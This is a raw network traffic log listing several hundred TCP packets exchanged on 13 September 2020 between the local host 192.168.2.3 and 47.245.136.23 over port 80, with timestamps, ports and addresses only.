Sep 13, 2020 20:55:12.698331118 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698333025 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.698348045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698362112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698376894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698395967 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698410988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698430061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698448896 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698534966 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.722443104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722470045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722487926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722498894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722507954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722527027 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722549915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722574949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722596884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722608089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722615957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722620010 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.722625971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722635031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722644091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722652912 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722740889 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722755909 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.722775936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722841024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722858906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722870111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722878933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722887993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722897053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722908020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722908020 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.722923040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722932100 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.722940922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.723084927 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.746332884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746345043 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746352911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746360064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746407032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746419907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746448040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746474028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746493101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746505022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746515036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746560097 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.746640921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746659994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746671915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.746721983 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.746834993 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.782990932 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.785222054 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.806713104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.806730986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.806746960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.806834936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.806874037 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.806919098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.806930065 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.806967974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807002068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807027102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807070017 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807092905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807147980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807180882 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807194948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807233095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807274103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807295084 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807313919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807369947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807405949 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807461023 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807487011 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807564974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807601929 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807602882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807687998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807698965 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807748079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807792902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807833910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807843924 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807878971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807919979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807960033 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.807965040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.807998896 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808037043 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808079958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808094025 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808120012 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808152914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808202028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808209896 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808244944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808288097 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808324099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808332920 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808386087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808445930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808474064 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808494091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808538914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808588028 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808634996 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808682919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808697939 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808743000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808815956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808866978 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.808901072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.808955908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809003115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809010983 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809050083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809120893 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809124947 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809179068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809220076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809242010 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809267044 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809339046 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809381962 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809421062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809468985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809478045 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809487104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809504032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809520006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809537888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809551954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809567928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809587002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809602976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809621096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809638023 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809654951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809659004 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809672117 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809686899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809701920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809720039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809735060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809751034 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809767962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809783936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809798002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809813976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809830904 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809847116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809873104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809883118 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.809899092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809915066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809938908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809957027 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809974909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.809993029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810010910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810028076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810040951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810056925 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810074091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810091972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810108900 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810122013 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.810127020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810143948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810156107 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810169935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810188055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810204029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810221910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810240030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810271978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810321093 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810338020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810357094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810373068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810384989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810398102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810415983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810420036 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.810432911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810447931 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810457945 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810491085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810518026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810575962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810606956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810657024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810723066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810744047 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.810790062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810825109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810884953 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.810892105 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.810935020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811005116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811045885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811068058 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.811103106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811139107 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811182976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811204910 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.811216116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811266899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811311007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811342001 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.811367035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811392069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811408997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811427116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811444044 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811461926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811480045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811494112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811508894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811517000 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.811525106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811541080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811554909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811573029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811589956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811608076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811625004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811640978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811655998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811671972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811690092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811705112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811722040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811727047 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.811738968 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811753035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811763048 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811779976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811790943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811805010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811832905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811836004 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.811857939 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811872959 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811889887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811927080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811939001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811954021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811971903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.811988115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812005997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812022924 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812035084 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812048912 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812067032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812084913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812097073 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812112093 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812128067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812138081 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.812145948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812163115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812180042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812197924 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812215090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812232971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812252998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812268972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812289953 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812304020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812311888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812320948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812330008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812340975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812354088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812366962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812375069 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.812376022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812385082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812392950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812402010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812411070 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812419891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812427998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812438965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812448025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812458038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812467098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812475920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812484980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812494040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812503099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812511921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812520981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812529087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812537909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.812565088 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.812592983 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.812657118 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.812778950 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.837146044 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837239981 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.837241888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837266922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837295055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837318897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837342978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837368965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837414980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837439060 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.837447882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837466002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837483883 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837506056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837531090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837548971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837563992 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837573051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837591887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837632895 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.837636948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837661982 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837685108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837708950 CEST	80	49723	47.245.136.23	192.168.2.3
